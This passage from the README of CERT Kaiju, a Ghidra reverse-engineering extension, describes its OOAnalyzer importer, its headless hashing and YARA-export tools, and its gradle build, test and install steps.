  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file, in this case example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain, edit, and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

As an alternative to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you forget it, gradle will abort with an error message asking for it.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update your AUTOCATS clone (e.g., with git pull) whenever you pull the latest Kaiju source code, to ensure the two repositories stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the auto-remove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju

